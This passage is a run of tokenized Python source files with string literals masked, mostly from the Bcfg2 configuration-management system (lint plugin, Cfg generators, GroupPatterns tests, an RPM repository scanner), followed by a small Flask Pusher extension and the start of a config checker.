: '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import Bcfg2 . Server . Lint <EOL> class GroupNames ( Bcfg2 . Server . Lint . ServerPlugin ) : <EOL> """<STR_LIT>""" <EOL> pattern = r'<STR_LIT>' <EOL> valid = re . compile ( r'<STR_LIT>' + pattern ) <EOL> def Run ( self ) : <EOL> self . check_metadata ( ) <EOL> if '<STR_LIT>' in self . core . plugins : <EOL> self . check_rules ( ) <EOL> if '<STR_LIT>' in self . core . plugins : <EOL> self . check_bundles ( ) <EOL> if '<STR_LIT>' in self . core . plugins : <EOL> self . check_grouppatterns ( ) <EOL> if '<STR_LIT>' in self . core . plugins : <EOL> self . check_cfg ( ) <EOL> @ classmethod <EOL> def Errors ( cls ) : <EOL> return { "<STR_LIT>" : "<STR_LIT:error>" } <EOL> def check_rules ( self ) : <EOL> """<STR_LIT>""" <EOL> for rules in self . core . plugins [ '<STR_LIT>' ] . entries . values ( ) : <EOL> if not self . HandlesFile ( rules . name ) : <EOL> continue <EOL> xdata = rules . pnode . data <EOL> self . check_entries ( xdata . xpath ( "<STR_LIT>" ) , <EOL> os . path . join ( Bcfg2 . Options . setup . repository , <EOL> rules . name ) ) <EOL> def check_bundles ( self ) : <EOL> """<STR_LIT>""" <EOL> for bundle in self . core . plugins [ '<STR_LIT>' ] . entries . values ( ) : <EOL> if self . HandlesFile ( bundle . name ) and bundle . template is None : <EOL> self . check_entries ( bundle . xdata . xpath ( "<STR_LIT>" ) , <EOL> bundle . name ) <EOL> def check_metadata ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_entries ( self . metadata . groups_xml . xdata . xpath ( "<STR_LIT>" ) , <EOL> os . path . join ( Bcfg2 . Options . setup . repository , <EOL> self . metadata . groups_xml . name ) ) <EOL> def check_grouppatterns ( self ) : <EOL> """<STR_LIT>""" <EOL> cfg = self . core . plugins [ '<STR_LIT>' ] . config <EOL> if not self . HandlesFile ( cfg . name ) : <EOL> return <EOL> for grp in cfg . xdata . xpath ( '<STR_LIT>' ) : <EOL> if not self . valid . search ( grp . text ) : <EOL> self . 
LintError ( "<STR_LIT>" , <EOL> "<STR_LIT>" % <EOL> ( cfg . name , self . RenderXML ( grp , keep_text = True ) ) ) <EOL> def check_cfg ( self ) : <EOL> """<STR_LIT>""" <EOL> for root , _ , files in os . walk ( self . core . plugins [ '<STR_LIT>' ] . data ) : <EOL> for fname in files : <EOL> basename = os . path . basename ( root ) <EOL> if ( re . search ( r'<STR_LIT>' % basename , fname ) and <EOL> not re . search ( r'<STR_LIT>' % basename + self . pattern , <EOL> fname ) ) : <EOL> self . LintError ( "<STR_LIT>" , <EOL> "<STR_LIT>" % <EOL> os . path . join ( root , fname ) ) <EOL> def check_entries ( self , entries , fname ) : <EOL> """<STR_LIT>""" <EOL> for grp in entries : <EOL> if not self . valid . search ( grp . get ( "<STR_LIT:name>" ) ) : <EOL> self . LintError ( "<STR_LIT>" , <EOL> "<STR_LIT>" % <EOL> ( fname , self . RenderXML ( grp ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from Bcfg2 . Server . Plugins . Cfg . CfgJinja2Generator import CfgJinja2Generator <EOL> from Bcfg2 . Server . Plugins . Cfg . CfgEncryptedGenerator import CfgEncryptedGenerator <EOL> class CfgEncryptedJinja2Generator ( CfgJinja2Generator , CfgEncryptedGenerator ) : <EOL> """<STR_LIT>""" <EOL> __extensions__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> __priority__ = <NUM_LIT:0> <EOL> def handle_event ( self , event ) : <EOL> CfgEncryptedGenerator . handle_event ( self , event ) <EOL> handle_event . __doc__ = CfgEncryptedGenerator . handle_event . __doc__ <EOL> def get_data ( self , entry , metadata ) : <EOL> return CfgJinja2Generator . get_data ( self , entry , metadata ) <EOL> get_data . __doc__ = CfgJinja2Generator . get_data . __doc__ </s>
<s> """<STR_LIT>""" <EOL> import Bcfg2 . Server . Plugin <EOL> class POSIXCompat ( Bcfg2 . Server . Plugin . Plugin , <EOL> Bcfg2 . Server . Plugin . GoalValidator ) : <EOL> """<STR_LIT>""" <EOL> create = False <EOL> def __init__ ( self , core ) : <EOL> Bcfg2 . Server . Plugin . Plugin . __init__ ( self , core ) <EOL> Bcfg2 . Server . Plugin . GoalValidator . __init__ ( self ) <EOL> def validate_goals ( self , metadata , goals ) : <EOL> """<STR_LIT>""" <EOL> if metadata . version_info and metadata . version_info >= ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> return <EOL> for goal in goals : <EOL> for entry in goal . getchildren ( ) : <EOL> if entry . tag == '<STR_LIT>' and '<STR_LIT>' in entry . keys ( ) : <EOL> entry . set ( '<STR_LIT>' , entry . get ( '<STR_LIT>' ) ) </s>
<s> """<STR_LIT>""" <EOL> import lxml . etree <EOL> XI = '<STR_LIT>' <EOL> XI_NAMESPACE = '<STR_LIT>' % XI <EOL> XMLParser = lxml . etree . XMLParser ( remove_blank_text = True ) <EOL> core = None </s>
<s> """<STR_LIT>""" <EOL> from Bcfg2 . Options import Option <EOL> class Two ( object ) : <EOL> """<STR_LIT>""" <EOL> options = [ Option ( '<STR_LIT>' , cf = ( "<STR_LIT>" , "<STR_LIT:test>" ) , dest = "<STR_LIT:test>" , default = "<STR_LIT:bar>" ) ] </s>
<s> import os <EOL> import sys <EOL> import lxml . etree <EOL> import Bcfg2 . Server . Plugin <EOL> from mock import Mock , MagicMock , patch <EOL> from Bcfg2 . Server . Plugins . GroupPatterns import * <EOL> path = os . path . dirname ( __file__ ) <EOL> while path != "<STR_LIT:/>" : <EOL> if os . path . basename ( path ) . lower ( ) . startswith ( "<STR_LIT:test>" ) : <EOL> sys . path . append ( path ) <EOL> if os . path . basename ( path ) == "<STR_LIT>" : <EOL> break <EOL> path = os . path . dirname ( path ) <EOL> from common import * <EOL> from TestPlugin import TestXMLFileBacked , TestPlugin , TestConnector <EOL> class TestPatternMap ( Bcfg2TestCase ) : <EOL> def test_ranges ( self ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ( "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT:foo>" , "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT:foo>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) ] <EOL> groups = MagicMock ( ) <EOL> for rng , inc , exc in tests : <EOL> pmap = PatternMap ( None , rng , groups ) <EOL> for test in inc : <EOL> self . assertEqual ( pmap . process ( test ) , groups ) <EOL> for test in exc : <EOL> self . assertIsNone ( pmap . 
process ( test ) ) <EOL> def test_simple_patterns ( self ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ( "<STR_LIT>" , <EOL> [ "<STR_LIT:foo>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT:bar>" , "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT:foo>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) ] <EOL> groups = [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] <EOL> for rng , inc , exc in tests : <EOL> pmap = PatternMap ( rng , None , groups ) <EOL> for test in inc : <EOL> self . assertItemsEqual ( pmap . process ( test ) , groups ) <EOL> for test in exc : <EOL> self . assertIsNone ( pmap . process ( test ) ) <EOL> def test_backref_patterns ( self ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ( "<STR_LIT>" , [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { "<STR_LIT:foo>" : [ '<STR_LIT:a>' , '<STR_LIT:a>' , '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> "<STR_LIT>" : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> "<STR_LIT>" : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } ) , <EOL> ( "<STR_LIT>" , [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { "<STR_LIT:foo>" : None , <EOL> "<STR_LIT>" : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:a>' ] , <EOL> "<STR_LIT>" : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:bar>' ] } ) ] <EOL> for rng , groups , cases in tests : <EOL> pmap = PatternMap ( rng , None , groups ) <EOL> for name , ret in cases . items ( ) : <EOL> if ret is None : <EOL> self . assertIsNone ( pmap . process ( name ) ) <EOL> else : <EOL> self . assertItemsEqual ( pmap . 
process ( name ) , ret ) <EOL> class TestPatternFile ( TestXMLFileBacked ) : <EOL> test_obj = PatternFile <EOL> should_monitor = True <EOL> def get_obj ( self , path = None , fam = None , core = None , should_monitor = True ) : <EOL> if path is None : <EOL> path = self . path <EOL> if fam and not core : <EOL> core = Mock ( ) <EOL> core . fam = fam <EOL> elif not core : <EOL> core = Mock ( ) <EOL> @ patchIf ( not isinstance ( lxml . etree . Element , Mock ) , <EOL> "<STR_LIT>" , Mock ( ) ) <EOL> def inner ( ) : <EOL> return self . test_obj ( path , core = core ) <EOL> return inner ( ) <EOL> @ patch ( "<STR_LIT>" ) <EOL> def test_Index ( self , mock_PatternMap ) : <EOL> TestXMLFileBacked . test_Index ( self ) <EOL> core = Mock ( ) <EOL> pf = self . get_obj ( core = core ) <EOL> pf . data = """<STR_LIT>""" <EOL> core . metadata_cache_mode = '<STR_LIT>' <EOL> pf . Index ( ) <EOL> core . metadata_cache . expire . assert_called_with ( ) <EOL> self . assertItemsEqual ( mock_PatternMap . call_args_list , <EOL> [ call ( "<STR_LIT>" , None , [ "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> call ( None , "<STR_LIT>" , [ "<STR_LIT>" ] ) ] ) <EOL> def test_process_patterns ( self ) : <EOL> pf = self . get_obj ( ) <EOL> pf . patterns = [ Mock ( ) , Mock ( ) , Mock ( ) ] <EOL> pf . patterns [ <NUM_LIT:0> ] . process . return_value = [ "<STR_LIT:a>" , "<STR_LIT:b>" ] <EOL> pf . patterns [ <NUM_LIT:1> ] . process . return_value = None <EOL> pf . patterns [ <NUM_LIT:2> ] . process . return_value = [ "<STR_LIT:b>" , "<STR_LIT:c>" ] <EOL> self . assertItemsEqual ( pf . process_patterns ( "<STR_LIT>" ) , <EOL> [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] ) <EOL> for pat in pf . patterns : <EOL> pat . process . assert_called_with ( "<STR_LIT>" ) <EOL> class TestGroupPatterns ( TestPlugin , TestConnector ) : <EOL> test_obj = GroupPatterns <EOL> def get_obj ( self , core = None ) : <EOL> @ patchIf ( not isinstance ( lxml . etree . 
Element , Mock ) , <EOL> "<STR_LIT>" , Mock ( ) ) <EOL> def inner ( ) : <EOL> return TestPlugin . get_obj ( self , core = core ) <EOL> return inner ( ) <EOL> def test_get_additional_groups ( self ) : <EOL> gp = self . get_obj ( ) <EOL> gp . config = Mock ( ) <EOL> metadata = Mock ( ) <EOL> self . assertEqual ( gp . get_additional_groups ( metadata ) , <EOL> gp . config . process_patterns . return_value ) <EOL> gp . config . process_patterns . assert_called_with ( metadata . hostname ) </s>
<s> import os <EOL> import sys <EOL> import subprocess <EOL> import getopt <EOL> import re <EOL> import datetime <EOL> from socket import gethostname <EOL> def run_or_die ( command ) : <EOL> """<STR_LIT>""" <EOL> ( status , stdio ) = subprocess . getstatusoutput ( command ) <EOL> if status != <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" % <EOL> ( command , status , stdio ) ) <EOL> return stdio <EOL> def rpmblob_cmp ( a , b ) : <EOL> """<STR_LIT>""" <EOL> ret = cmp ( a [ '<STR_LIT:name>' ] , b [ '<STR_LIT:name>' ] ) <EOL> if ret == <NUM_LIT:0> : <EOL> ret = verstr_cmp ( a [ '<STR_LIT:version>' ] , b [ '<STR_LIT:version>' ] ) <EOL> if ret == <NUM_LIT:0> : <EOL> ret = verstr_cmp ( a [ '<STR_LIT>' ] , b [ '<STR_LIT>' ] ) <EOL> return ret <EOL> def verstr_cmp ( a , b ) : <EOL> """<STR_LIT>""" <EOL> ret = <NUM_LIT:0> <EOL> index = <NUM_LIT:0> <EOL> a_parts = subdivide ( a ) <EOL> b_parts = subdivide ( b ) <EOL> prerelease_pattern = re . compile ( '<STR_LIT>' ) <EOL> while ret == <NUM_LIT:0> and index < min ( len ( a_parts ) , len ( b_parts ) ) : <EOL> subindex = <NUM_LIT:0> <EOL> a_subparts = a_parts [ index ] <EOL> b_subparts = b_parts [ index ] <EOL> while ret == <NUM_LIT:0> and subindex < min ( len ( a_subparts ) , len ( b_subparts ) ) : <EOL> ret = cmp ( a_subparts [ subindex ] , b_subparts [ subindex ] ) <EOL> if ret != <NUM_LIT:0> : <EOL> return ret <EOL> subindex = subindex + <NUM_LIT:1> <EOL> if len ( a_subparts ) != len ( b_subparts ) : <EOL> if len ( a_subparts ) > len ( b_subparts ) and prerelease_pattern . match ( str ( a_subparts [ subindex ] ) ) : <EOL> return - <NUM_LIT:1> <EOL> elif len ( a_subparts ) < len ( b_subparts ) and prerelease_pattern . match ( str ( b_subparts [ subindex ] ) ) : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return len ( a_subparts ) - len ( b_subparts ) <EOL> index = index + <NUM_LIT:1> <EOL> if len ( a_parts ) != len ( b_parts ) : <EOL> if len ( a_parts ) > len ( b_parts ) and prerelease_pattern . 
match ( str ( a_parts [ index ] [ <NUM_LIT:0> ] ) ) : <EOL> return - <NUM_LIT:1> <EOL> elif len ( a_parts ) < len ( b_parts ) and prerelease_pattern . match ( str ( b_parts [ index ] [ <NUM_LIT:0> ] ) ) : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return len ( a_parts ) - len ( b_parts ) <EOL> return ret <EOL> def subdivide ( verstr ) : <EOL> """<STR_LIT>""" <EOL> parts = [ ] <EOL> major_parts = verstr . split ( '<STR_LIT:.>' ) <EOL> for major_part in major_parts : <EOL> minor_parts = [ ] <EOL> index = <NUM_LIT:0> <EOL> while index < len ( major_part ) : <EOL> if major_part [ index ] . isdigit ( ) : <EOL> digit_str_part = "<STR_LIT>" <EOL> while index < len ( major_part ) and major_part [ index ] . isdigit ( ) : <EOL> digit_str_part = digit_str_part + major_part [ index ] <EOL> index = index + <NUM_LIT:1> <EOL> digit_part = int ( digit_str_part ) <EOL> minor_parts . append ( digit_part ) <EOL> elif major_part [ index ] . isalpha ( ) : <EOL> alpha_part = "<STR_LIT>" <EOL> while index < len ( major_part ) and major_part [ index ] . isalpha ( ) : <EOL> alpha_part = alpha_part + major_part [ index ] <EOL> index = index + <NUM_LIT:1> <EOL> minor_parts . append ( alpha_part ) <EOL> elif not major_part [ index ] . isalnum ( ) : <EOL> other_part = "<STR_LIT>" <EOL> while index < len ( major_part ) and not major_part [ index ] . isalnum ( ) : <EOL> other_part = other_part + major_part [ index ] <EOL> index = index + <NUM_LIT:1> <EOL> minor_parts . append ( other_part ) <EOL> parts . 
append ( minor_parts ) <EOL> return parts <EOL> subarch_mapping = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> arch_mapping = { '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> def parse_rpm ( path , filename ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' % ( path , filename ) <EOL> output = run_or_die ( cmd ) <EOL> ( name , version , release , subarch ) = output . split ( ) <EOL> if subarch not in list ( subarch_mapping . keys ( ) ) : <EOL> raise Exception ( "<STR_LIT>" % ( path , filename , subarch ) ) <EOL> return ( name , version , release , subarch ) <EOL> def parse_rpm_filename ( path , filename ) : <EOL> """<STR_LIT>""" <EOL> name , version , release , subarch = None , None , None , None <EOL> try : <EOL> ( major , minor ) = sys . version_info [ : <NUM_LIT:2> ] <EOL> if major >= <NUM_LIT:2> and minor >= <NUM_LIT:4> : <EOL> ( blob , subarch , extension ) = filename . rsplit ( '<STR_LIT:.>' , <NUM_LIT:2> ) <EOL> ( name , version , release ) = blob . rsplit ( '<STR_LIT:->' , <NUM_LIT:2> ) <EOL> else : <EOL> ( rextension , rsubarch , rblob ) = filename [ : : - <NUM_LIT:1> ] . split ( '<STR_LIT:.>' , <NUM_LIT:2> ) <EOL> ( blob , subarch , extension ) = ( rblob [ : : - <NUM_LIT:1> ] , rsubarch [ : : - <NUM_LIT:1> ] , rextension [ : : - <NUM_LIT:1> ] ) <EOL> ( rrelease , rversion , rname ) = blob [ : : - <NUM_LIT:1> ] . split ( '<STR_LIT:->' , <NUM_LIT:2> ) <EOL> ( name , version , release ) = ( rname [ : : - <NUM_LIT:1> ] , rversion [ : : - <NUM_LIT:1> ] , rrelease [ : : - <NUM_LIT:1> ] ) <EOL> if subarch not in list ( subarch_mapping . 
keys ( ) ) : <EOL> raise "<STR_LIT>" % ( path , filename , subarch ) <EOL> except : <EOL> sys . stderr . write ( "<STR_LIT>" % ( path , filename ) ) <EOL> ( name , version , release , subarch ) = parse_rpm ( path , filename ) <EOL> return ( name , version , release , subarch ) <EOL> def get_pkgs ( rpmdir ) : <EOL> """<STR_LIT>""" <EOL> pkgs = { } <EOL> """<STR_LIT>""" <EOL> rpms = [ item for item in os . listdir ( rpmdir ) if item . endswith ( '<STR_LIT>' ) ] <EOL> for filename in rpms : <EOL> ( name , version , release , subarch ) = parse_rpm_filename ( rpmdir , filename ) <EOL> rpmblob = { '<STR_LIT:file>' : filename , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT:version>' : version , <EOL> '<STR_LIT>' : release , <EOL> '<STR_LIT>' : subarch } <EOL> if name in pkgs : <EOL> pkgs [ name ] . append ( rpmblob ) <EOL> else : <EOL> pkgs [ name ] = [ rpmblob ] <EOL> return pkgs <EOL> def prune_pkgs_latest ( pkgs ) : <EOL> """<STR_LIT>""" <EOL> latest_pkgs = { } <EOL> for rpmblobs in list ( pkgs . values ( ) ) : <EOL> ( major , minor ) = sys . version_info [ : <NUM_LIT:2> ] <EOL> if major >= <NUM_LIT:2> and minor >= <NUM_LIT:4> : <EOL> rpmblobs . sort ( rpmblob_cmp , reverse = True ) <EOL> else : <EOL> rpmblobs . sort ( rpmblob_cmp ) <EOL> rpmblobs . reverse ( ) <EOL> pkg_name = rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> all_archs = [ blob for blob in rpmblobs if blob [ '<STR_LIT:version>' ] == rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT:version>' ] and <EOL> blob [ '<STR_LIT>' ] == rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ] <EOL> latest_pkgs [ pkg_name ] = all_archs <EOL> return latest_pkgs <EOL> def prune_pkgs_archs ( pkgs ) : <EOL> """<STR_LIT>""" <EOL> pruned_pkgs = { } <EOL> for rpmblobs in list ( pkgs . values ( ) ) : <EOL> pkg_name = rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> arch_sifter = { } <EOL> for challenger in rpmblobs : <EOL> arch = subarch_mapping [ challenger [ '<STR_LIT>' ] ] <EOL> incumbent = arch_sifter . 
get ( arch ) <EOL> if incumbent == None : <EOL> arch_sifter [ arch ] = challenger <EOL> else : <EOL> subarchs = arch_mapping [ arch ] <EOL> challenger_index = subarchs . index ( challenger [ '<STR_LIT>' ] ) <EOL> incumbent_index = subarchs . index ( incumbent [ '<STR_LIT>' ] ) <EOL> if challenger_index < incumbent_index : <EOL> arch_sifter [ arch ] = challenger <EOL> pruned_pkgs [ pkg_name ] = list ( arch_sifter . values ( ) ) <EOL> return pruned_pkgs <EOL> def get_date_from_desc ( date_desc ) : <EOL> """<STR_LIT>""" <EOL> stdio = run_or_die ( '<STR_LIT>' + date_desc + '<STR_LIT>' ) <EOL> ( year_str , month_str , day_str ) = stdio . split ( ) <EOL> year = int ( year_str ) <EOL> month = int ( month_str ) <EOL> day = int ( day_str ) <EOL> date_obj = datetime . date ( year , month , day ) <EOL> return date_obj <EOL> def get_mtime_date ( path ) : <EOL> """<STR_LIT>""" <EOL> return datetime . date . fromtimestamp ( os . stat ( path ) . st_mtime ) <EOL> def prune_pkgs_timely ( pkgs , start_date_desc = None , end_date_desc = None , rpmdir = '<STR_LIT:.>' ) : <EOL> """<STR_LIT>""" <EOL> start_date = None <EOL> if start_date_desc != None : <EOL> start_date = get_date_from_desc ( start_date_desc ) <EOL> end_date = None <EOL> if end_date_desc != None : <EOL> end_date = get_date_from_desc ( end_date_desc ) <EOL> if start_date == None and end_date == None : <EOL> return pkgs <EOL> if start_date != None : <EOL> for rpmblobs in list ( pkgs . values ( ) ) : <EOL> pkg_name = rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> timely_blobs = [ blob for blob in rpmblobs if start_date < get_mtime_date ( rpmdir + '<STR_LIT:/>' + blob [ '<STR_LIT:file>' ] ) ] <EOL> if len ( timely_blobs ) == <NUM_LIT:0> : <EOL> del pkgs [ pkg_name ] <EOL> else : <EOL> pkgs [ pkg_name ] = timely_blobs <EOL> if end_date != None : <EOL> for rpmblobs in list ( pkgs . 
values ( ) ) : <EOL> pkg_name = rpmblobs [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> timely_blobs = [ blob for blob in rpmblobs if get_mtime_date ( rpmdir + '<STR_LIT:/>' + blob [ '<STR_LIT:file>' ] ) <= end_date ] <EOL> if len ( timely_blobs ) == <NUM_LIT:0> : <EOL> del pkgs [ pkg_name ] <EOL> else : <EOL> pkgs [ pkg_name ] = timely_blobs <EOL> return pkgs <EOL> def sorted_values ( adict ) : <EOL> """<STR_LIT>""" <EOL> items = list ( adict . items ( ) ) <EOL> items . sort ( ) <EOL> return [ value for key , value in items ] <EOL> def scan_rpm_dir ( rpmdir , uri , group , priority = <NUM_LIT:0> , output = sys . stdout , start_date_desc = None , end_date_desc = None ) : <EOL> """<STR_LIT>""" <EOL> output . write ( '<STR_LIT>' % ( uri , priority ) ) <EOL> output . write ( '<STR_LIT>' % group ) <EOL> pkgs = prune_pkgs_archs ( prune_pkgs_latest ( prune_pkgs_timely ( get_pkgs ( rpmdir ) , start_date_desc , end_date_desc , rpmdir ) ) ) <EOL> for rpmblobs in sorted_values ( pkgs ) : <EOL> if len ( rpmblobs ) == <NUM_LIT:1> : <EOL> rpmblob = rpmblobs [ <NUM_LIT:0> ] <EOL> output . write ( '<STR_LIT>' % <EOL> ( rpmblob [ '<STR_LIT:name>' ] , rpmblob [ '<STR_LIT:file>' ] , rpmblob [ '<STR_LIT:version>' ] , rpmblob [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> rpmblob = rpmblobs [ <NUM_LIT:0> ] <EOL> subarchs = [ blob [ '<STR_LIT>' ] for blob in rpmblobs ] <EOL> subarchs . sort ( ) <EOL> multiarch_string = '<STR_LIT:U+0020>' . join ( subarchs ) <EOL> pattern_string = '<STR_LIT>' % '<STR_LIT:|>' . join ( subarchs ) <EOL> pattern = re . compile ( pattern_string ) <EOL> multiarch_file = pattern . sub ( '<STR_LIT>' , rpmblob [ '<STR_LIT:file>' ] ) <EOL> output . write ( '<STR_LIT>' % <EOL> ( rpmblob [ '<STR_LIT:name>' ] , multiarch_file , rpmblob [ '<STR_LIT:version>' ] , rpmblob [ '<STR_LIT>' ] , multiarch_string ) ) <EOL> output . write ( '<STR_LIT>' ) <EOL> output . write ( '<STR_LIT>' ) <EOL> def usage ( output = sys . stdout ) : <EOL> output . write ( "<STR_LIT>" % sys . 
argv [ <NUM_LIT:0> ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> except getopt . GetoptError : <EOL> usage ( sys . stderr ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> group = "<STR_LIT>" <EOL> uri = "<STR_LIT>" + gethostname ( ) + "<STR_LIT>" <EOL> rpmdir = "<STR_LIT:.>" <EOL> priority = "<STR_LIT:0>" <EOL> output = None <EOL> for opt , arg in opts : <EOL> if opt in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> group = arg <EOL> elif opt in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> uri = arg <EOL> elif opt in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> rpmdir = arg <EOL> elif opt in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> priority = arg <EOL> elif opt in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> output = arg <EOL> if output == None : <EOL> output = sys . stdout <EOL> else : <EOL> output = file ( output , "<STR_LIT:w>" ) <EOL> scan_rpm_dir ( rpmdir , uri , group , priority , output ) </s>
<s> from pusher import Pusher as BasePusher <EOL> class Pusher ( BasePusher ) : <EOL> def __init__ ( self , app = None , ** options ) : <EOL> if app is not None : <EOL> self . init_app ( app , ** options ) <EOL> def init_app ( self , app , ** options ) : <EOL> """<STR_LIT>""" <EOL> sd = options . setdefault <EOL> conf = app . config <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT:key>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' , True ) ) <EOL> sd ( '<STR_LIT:host>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT:port>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' ) ) <EOL> sd ( '<STR_LIT>' , ( conf . get ( '<STR_LIT>' ) <EOL> or app . json_encoder ) ) <EOL> sd ( '<STR_LIT>' , ( conf . get ( '<STR_LIT>' ) <EOL> or app . json_decoder ) ) <EOL> if conf . get ( '<STR_LIT>' ) : <EOL> sd ( '<STR_LIT>' , conf . get ( '<STR_LIT>' ) ) <EOL> super ( Pusher , self ) . __init__ ( ** options ) <EOL> if not hasattr ( app , '<STR_LIT>' ) : <EOL> app . extensions = { } <EOL> app . extensions [ '<STR_LIT>' ] = self </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import os . path as path <EOL> import warnings <EOL> import sklearn . externals . joblib as joblib <EOL> from sklearn . pipeline import Pipeline <EOL> from mempamal . crossval import make_folds <EOL> def _check_conf ( cfg , req_keys , cat = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> for k in req_keys : <EOL> try : <EOL> cfg [ k ] <EOL> except KeyError : <EOL> raise KeyError ( ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( cat , k ) ) <EOL> def _check_cv_conf ( cfg ) : <EOL> """<STR_LIT>""" <EOL> req_keys = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> _check_conf ( cfg , req_keys , cat = "<STR_LIT>" ) <EOL> req_keys = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> _check_conf ( cfg [ "<STR_LIT>" ] , req_keys , cat = "<STR_LIT>" ) <EOL> if cfg [ "<STR_LIT>" ] : <EOL> req_keys = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> _check_conf ( cfg , [ 